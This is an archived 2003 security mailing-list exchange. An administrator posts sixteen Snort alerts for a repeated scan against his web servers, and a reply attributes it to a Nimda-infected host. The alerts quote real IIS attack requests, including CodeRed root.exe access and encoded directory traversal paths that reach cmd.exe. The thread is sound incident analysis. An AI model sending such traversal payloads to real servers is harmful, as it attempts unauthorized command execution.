|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RE: Same sequence...
From: Henderson, Dennis K. (Dennis.Henderson
umb.com)
Date: Tue Dec 02 2003 - 06:26:03 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Its probably a real nimda infected host.
Dennis
-----Original Message-----
From: Dejan Markovic [mailto:dejanmarkovichotmail.com]
Sent: Monday, December 01, 2003 2:02 PM
To: INCIDENTSsecurityfocus.com
Subject: Same sequence...
Hi Guys,
Sent this one to the wrong group the first time, thanks J, so here goes.
Does anyone know which tool is being used for this scan. Snort has been
logging the same sequence of scans from various IPs to all Web servers on my
network, regardless that some are IIS and the others Apache. The data is
included below.
====================================================================
(1) WEB-IIS CodeRed v2 root.exe access GET /scripts/root.exe?/c+dir
HTTP/1.0
(2) WEB-IIS CodeRed v2 root.exe access GET /MSADC/root.exe?/c+dir HTTP/1.0
(3) WEB-IIS cmd.exe access GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(4) WEB-IIS cmd.exe access GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(5) WEB-IIS unicode directory traversal attempt GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(6) WEB-FRONTPAGE /_vti_bin/ access GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
(7) WEB-IIS _mem_bin access GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
(8) WEB-IIS unicode directory traversal attempt GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0
(9) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(10) WEB-IIS cmd.exe access GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(11) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(12) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(13) WEB-IIS cmd.exe access GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(14) WEB-IIS cmd.exe access GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(15) WEB-IIS cmd.exe access GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(16) WEB-IIS cmd.exe access GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
====================================================================
The whole scan takes from 2 seconds to under a minute in some cases, but
there is always 16 requests in the same order. Sorry if this has already
been on the list and thanks.
Regards,
Dan
---------------------------------------------------------------------------
----------------------------------------------------------------------------
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]